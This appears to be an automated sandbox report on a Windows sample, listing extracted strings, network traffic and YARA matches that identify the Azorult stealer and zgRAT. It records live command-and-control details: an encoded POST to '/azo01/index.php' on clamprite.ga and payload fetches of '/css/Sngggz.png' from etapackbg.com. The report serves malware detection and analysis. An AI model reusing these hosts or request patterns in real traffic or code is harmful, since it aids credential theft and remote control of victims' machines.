              Source: 6CJfScEKhr.exe, 0000000E.00000003.485714158.0000000004980000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483837799.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499068688.0000000003B10000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496671801.0000000003AB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488200891.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483758150.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.497457894.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.489809585.0000000003E74000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483088942.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498048842.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.482231000.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498532721.0000000003ABC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488137540.0000000003E78000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502531240.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487353735.0000000004978000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: 6CJfScEKhr.exe, 0000000E.00000003.485714158.0000000004980000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483837799.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499068688.0000000003B10000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496671801.0000000003AB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488200891.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483758150.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.497457894.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.489809585.0000000003E74000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483088942.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498048842.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.482231000.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498532721.0000000003ABC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488137540.0000000003E78000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502531240.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487353735.0000000004978000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: 6CJfScEKhr.exe, 0000000E.00000003.485714158.0000000004980000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483837799.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499068688.0000000003B10000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496671801.0000000003AB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488200891.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483758150.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.497457894.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.489809585.0000000003E74000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483088942.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498048842.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.482231000.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498532721.0000000003ABC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488137540.0000000003E78000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502531240.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487353735.0000000004978000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
              Source: 6CJfScEKhr.exe, 0000000E.00000003.485714158.0000000004980000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483837799.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499068688.0000000003B10000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496671801.0000000003AB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488200891.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483758150.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.497457894.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.489809585.0000000003E74000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483088942.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498048842.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.482231000.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498532721.0000000003ABC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488137540.0000000003E78000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502531240.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487353735.0000000004978000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com0
              Source: 6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
              Source: 6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
              Source: 6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852
              Source: 6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt
              Source: 6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=
              Source: 6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.p
              Source: 6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php
              Source: 6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php:http://www.msn.com/de-ch/Zhttps://contextual.media.net/me
              Source: 6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
              Source: 6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.phpd=
              Source: 6CJfScEKhr.exe, 6CJfScEKhr.exe, 0000000E.00000000.402176995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000000.403321697.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://dotbit.me/a/
              Source: 6CJfScEKhr.exe, 00000000.00000002.406971785.0000000003AB3000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 00000000.00000002.408946193.000000000BFE0000.00000004.08000000.00040000.00000000.sdmp, 6CJfScEKhr.exe, 00000000.00000002.406535494.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.518824108.00000000026A0000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.519864421.0000000003573000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.520995677.0000000005350000.00000004.08000000.00040000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.519431243.0000000003451000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.519896768.0000000003F31000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.519547093.0000000003182000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.520559090.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.525075431.000000000C620000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: 6CJfScEKhr.exe, 00000000.00000002.406971785.0000000003AB3000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 00000000.00000002.408946193.000000000BFE0000.00000004.08000000.00040000.00000000.sdmp, 6CJfScEKhr.exe, 00000000.00000002.406535494.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.518824108.00000000026A0000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.519864421.0000000003573000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.520995677.0000000005350000.00000004.08000000.00040000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.519431243.0000000003451000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.519896768.0000000003F31000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.519547093.0000000003182000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.520559090.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.525075431.000000000C620000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: 6CJfScEKhr.exe, 00000000.00000002.406971785.0000000003AB3000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 00000000.00000002.408946193.000000000BFE0000.00000004.08000000.00040000.00000000.sdmp, 6CJfScEKhr.exe, 00000000.00000002.406535494.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.518824108.00000000026A0000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.519864421.0000000003573000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.520995677.0000000005350000.00000004.08000000.00040000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.519431243.0000000003451000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.519896768.0000000003F31000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.519547093.0000000003182000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.520559090.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.525075431.000000000C620000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: 6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authoriz
              Source: 6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize
              Source: 6CJfScEKhr.exe, 00000000.00000002.406971785.0000000003AB3000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 00000000.00000002.408946193.000000000BFE0000.00000004.08000000.00040000.00000000.sdmp, 6CJfScEKhr.exe, 00000000.00000002.406535494.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.518824108.00000000026A0000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.519864421.0000000003573000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.520995677.0000000005350000.00000004.08000000.00040000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.519431243.0000000003451000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.519896768.0000000003F31000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.519547093.0000000003182000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.520559090.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.525075431.000000000C620000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: Pthmzffh.exe, 00000015.00000002.519547093.0000000003182000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.520559090.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.525075431.000000000C620000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: 6CJfScEKhr.exe, 00000000.00000002.406971785.0000000003AB3000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 00000000.00000002.408946193.000000000BFE0000.00000004.08000000.00040000.00000000.sdmp, 6CJfScEKhr.exe, 00000000.00000002.406535494.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.519864421.0000000003573000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.520995677.0000000005350000.00000004.08000000.00040000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.519431243.0000000003451000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.519896768.0000000003F31000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.520559090.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.525075431.000000000C620000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
              Source: 6CJfScEKhr.exe, 0000000E.00000003.485714158.0000000004980000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483837799.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499068688.0000000003B10000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496671801.0000000003AB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488200891.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483758150.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.497457894.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.489809585.0000000003E74000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483088942.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498048842.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.482231000.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498532721.0000000003ABC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488137540.0000000003E78000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502531240.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487353735.0000000004978000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: 6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/Fs4c
              Source: 6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html
              Source: 6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=l
              Source: 6CJfScEKhr.exe, 0000000E.00000002.518729407.0000000003A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=l?
              Source: unknownHTTP traffic detected: POST /azo01/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: clamprite.gaContent-Length: 107Cache-Control: no-cacheData Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 8b 30 60 8b 30 63 8b 30 63 e8 26 66 9e 45 17 8b 31 11 8b 30 6d 8b 30 62 8b 30 61 e8 26 66 96 26 66 9f 40 70 9d 35 70 9c 47 13 8b 30 63 ef 42 70 9d 30 70 9d 36 70 9d 34 14 Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410b0`0c0c&fE10m0b0a&f&f@p5pG0cBp0p6p4
              Source: unknownDNS traffic detected: queries for: etapackbg.com
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00418688 GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,14_2_00418688
              Source: global trafficHTTP traffic detected: GET /css/Sngggz.png HTTP/1.1Host: etapackbg.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /css/Sngggz.png HTTP/1.1Host: etapackbg.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /css/Sngggz.png HTTP/1.1Host: etapackbg.comConnection: Keep-Alive

              E-Banking Fraud

              barindex
              Yara detected gzRat
              Source: Yara matchFile source: 15.2.Pthmzffh.exe.bb30000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.6CJfScEKhr.exe.3999510.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.6CJfScEKhr.exe.be90000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.Pthmzffh.exe.3f39510.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.Pthmzffh.exe.c4b0000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.6CJfScEKhr.exe.be90000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.Pthmzffh.exe.bb30000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.6CJfScEKhr.exe.3999510.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.Pthmzffh.exe.3f39510.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.Pthmzffh.exe.3459510.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.Pthmzffh.exe.3459510.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.Pthmzffh.exe.c4b0000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000015.00000002.524573757.000000000C4B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.407850693.000000000BE90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.519896768.0000000003F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.519431243.0000000003451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.406535494.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.523563780.000000000BB30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 14.0.6CJfScEKhr.exe.400000.14.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 14.0.6CJfScEKhr.exe.400000.14.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 14.0.6CJfScEKhr.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 14.0.6CJfScEKhr.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 15.2.Pthmzffh.exe.bb30000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 0.2.6CJfScEKhr.exe.3999510.3.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 0.2.6CJfScEKhr.exe.be90000.5.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 21.2.Pthmzffh.exe.3f39510.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 21.2.Pthmzffh.exe.c4b0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 14.0.6CJfScEKhr.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 14.0.6CJfScEKhr.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 14.0.6CJfScEKhr.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 14.0.6CJfScEKhr.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 14.0.6CJfScEKhr.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 14.0.6CJfScEKhr.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 14.0.6CJfScEKhr.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 14.0.6CJfScEKhr.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.6CJfScEKhr.exe.be90000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 14.0.6CJfScEKhr.exe.400000.12.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 14.0.6CJfScEKhr.exe.400000.12.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 15.2.Pthmzffh.exe.bb30000.7.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 14.2.6CJfScEKhr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
